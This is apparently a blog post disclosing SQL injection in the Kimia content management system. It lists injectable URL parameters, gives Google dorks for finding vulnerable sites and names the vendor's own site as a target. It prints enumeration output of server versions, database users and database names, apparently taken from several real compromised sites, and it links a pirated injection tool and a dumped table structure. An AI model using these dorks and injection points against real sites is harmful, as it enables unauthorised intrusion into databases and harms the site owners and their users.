[sqli] Kimia

An old one, but still works fine!

http://packetstormsecurity.org/files/view/101202/kimia-sql.txt
http://www.securityhome.eu/exploits/exploit_pdf.php?eid=11754170304e409574e5f234.09320930

http://www.victim.com/image-details.php?id=[SQL]
http://www.victim.com/alert_article.php?id=[SQL]
http://www.victim.com/news-article.php?id=[SQL]
http://www.victim.com/gallery-list.php?id=[SQL]
http://www.victim.com/newsitem.php?id=[SQL]

first some googling..

google dorks:
inurl:”image-details.php?id=”
inurl:”alert_article.php?id=”
inurl:”news-article.php?id=”
inurl:”gallery-list.php?id=”
inurl:”newsitem.php?id=”

http://<removed for privacy>/gallery-list.php?id=18
http://<removed for privacy>/producer/newsitem.php?id=6
http://<removed for privacy>/article.php?id=159
http://<removed for privacy>/products.php?id=41

ofcourse the makers
http://www.kimia.co.za/newslist.php?interval=10&min=30&newsID=72
This I won’t remove 😉 they are vulnerable themselfs 😛

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.2.6-1+lenny13
DB Server: MySQL >=5
Resp. Time(avg): 1678 ms
Current User: removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
propeo_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL error based
Resp. Time(avg): 542 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: System User: foxanr_1@<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
foxanr_db1

 

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 1439 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: @<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
joymag_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 3148 ms
Current User: kimiaa_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: kimiaa_db1
System User: kimiaa_1?dedi110

 

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 2508 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: robassu_db1
System User: @<removed for privacy>
Host Name:

table structure:  http://dl.dropbox.com/u/4378489/Forums/evilzone/Kimia_tables.html

Use with Havij Pro 1.15
http://www.ziddu.com/download/17108226/Havij_1.15_Pro.rar.html 

5 thoughts on “[sqli] Kimia

  1. Echt leerzame dingen man, je schrijfstijl is zeer amuserend.

    Blijf schrijven en posten, als je meer relevante && recente berichten zou posten zou je echt verkeer naar je site trekken. Je posts zijn awsome!

    Good job and keep it up man!

    Gr.

Leave a Reply to neusbeer Cancel reply

Your email address will not be published. Required fields are marked *